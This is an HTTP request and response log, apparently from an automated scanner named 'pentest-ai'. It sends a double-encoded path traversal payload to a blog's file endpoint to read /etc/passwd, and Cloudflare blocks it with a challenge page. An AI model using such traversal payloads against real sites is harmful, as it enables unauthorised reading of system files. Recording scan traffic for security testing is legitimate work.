REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/files?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9908
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83bbbebafa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=cjYPYve90nkiIHLo7uQ03Ho4ycyE%2FPOcWzi4vlY2t19Xv%2FIr4gfvNdJXIm0GKJy2bun4Fg%2FX2QUy91fGNfuDes7UrxaPhx4feC3tXQZXT2MfxKJeD7%2FbTyrQLTNIrnRuwvP9XYqm1YkGx7JiCA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83bbbebafa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'uZ7kwdRAkwfksAngDw.jWqEQ8dOGs_jBo.8t1vB04Pw-1784280682-1.2.1.1-8YlcvCOaSUq7z83m2nmONu2GuZ5gYu1dJ0r0PIqkitTxPzz2QndudAsCyC_k_FSW',cITimeS: '1784280682',cRay: 'a1c83bbbebafa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/files?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=DOCIL6AbiTei86XRZpJus2vVmEYxQINw0eWcXOdBBes-1784280682-1.0.1.1-vk.TRqSVyzEd6X6pxQYCrRc.ZzitA.q2qOfI3rOg9yU",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/files?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=DOCIL6AbiTei86XRZpJus2vVmEYxQINw0eWcXOdBBes-1784280682-1.0.1.1-vk.TRqSVyzEd6X6pxQYCrRc.ZzitA.q2qOfI3rOg9yU",md: 'YO9YumpuAF1eJgq_Xz4tG5w8YxqHpIZgtCMPLr2GKOc-1784280682-1.2.1.1-xPSLK_nCLUe2svGco2L5s3gfSHehPJSopHqJim9AnNr1uYAQKMmzcJlMjNDSjfpuqMWsaDQcnLlYG9tP9an5hDCj_sotWEWkfiUod_ZUjUr.wgHuGURDOwhjDb.7Sl2ud0VSIzMyZg1zeMvQKRdsQ30gRoprepmPYXH3l5mBwyhJM75Fni96M1Yv6kBIYP5v4UNs5qkn3oiRhH2CdENp6nDOx5GVIk78ctleB1yOqy7dhg.xc9A8Toi27IJHZHdW20bv3Oz891VkHo0ScNC54bVMQJA6Is1.IMHcKvVI_aAOn2gBaekTcoxvzFiO_nCvLhzT8k8mt.ZV5aidsMxIW3iiM4EqOrgN53YfQxyN52JQQ2Mj7Wx8puhQ.LLsEzOhDZPkO9JBn_UJzXD73HwiwDdi4rZKMSH7bKzRbOcAnLXqgH07lCDFRrEIIv.wgs72w0Vo697jkzThudRnnjvs5oWQbot0GP85s2ZyL_oW7koEHFFw09hA9ShVkLxVHRJ3MVl_MfaDHFmrbLR.ai.j_7ag64El1fVcUpXfujXOJsDYQ2GFu0SQTI93MLqSw_I4hIXEUuJEJliijMllQcVDSHxKFUhZRosyMIMsetxE15zQS30YDR5C1y241V5l8tisefww_sWEJRyQ1zs_tHq6elS9.G3J1tRMn5tlvW_js6HgPHfxK251sr2VCzl8em5O4iTL.fyAPYN_ZmuFC.65OBCVMDxCGZgd8mUM6SRs0bvSv7VQZfdcLid5brUgU967XFj04AuG4dbam4i7CwKezyg.iMe9KE_zocMY2C4.02UvqKZAqFpPMlA7TaPh8YVkAFgajwDMKjIG5zGMgtTDHRahM5aWgTrFJFupg8ctqbyBBzhWTo5TrdtOusgJzwhp_sdRMREMN78eCiNc3bn_gGE6i3DF1XXrsVHtsnVL.YYMrWmxMtL.LqlM0_WJygOlGIhuVEndQiWoI75dZtkLyvs3bf7O4pdwjiMi4cdd1Gjl1HBvOQOXkeHBfEDdj4XUE9kBOlR.Zz1oaQvAVTWWw5y8pUKdHQo9FB1fYlEH6A.zACEb4MQgabGamx8QYZsAp18j9KKYiauO0qoH5BZKx4V3YRHsFvhgvmdEs99NVB6XnSh23k7JvhWOktz_qGSR0BhqwnGC317HMiHIKcsLs3g8GWTeKTqQo1HB9jf6WfzZ9IZYn2SLFRt7eeAoOiktqgGgL7Ls44d7Zv0d0oJ5384CW95XOPL5WVBt6eRUz36y2FyFfIlF710ryBk7nU6y4H5E1X9kvVPEIGQXEMxOQWyD6WN1tiyGwZQS2U6utpBuUDBiiTJPFvfK3viwwGIPNQHwJwGEgHrBXwfH4ZErOhI1ejCt_x.ls.pmFxzDtHs',mdrd: 'JNx.uWQScSA2N.T.pqaF2oUSMomj3ady3gY7IXEOC9U-1784280682-1.2.1.1-4oeghBtXBurghdpTeriDY1EhAWtRsVIApJqjXqPlzDeT5QKTa2kR3oeYe4PuDh8UTZw3zobLgCeQE4vvmnvjfZoUlAd2cyoUcBGDETnZoyj0BBY88dKtHHpIV8vBgP7u1NADulgQIRAKpZoNjn5O.MjFp1IrrR5uEWOi6BYdqvCgUtOqrPUHrKs2PDvx2HwJITxRXK80FPdep0gVaHXFSGBw6xz8lguO5SqgyYuc4iojbMSvZfhNFWutUCI_ktmI',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83bbbebafa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/api/files?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=DOCIL6AbiTei86XRZpJus2vVmEYxQINw0eWcXOdBBes-1784280682-1.0.1.1-vk.TRqSVyzEd6X6pxQYCrRc.ZzitA.q2qOfI3rOg9yU"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
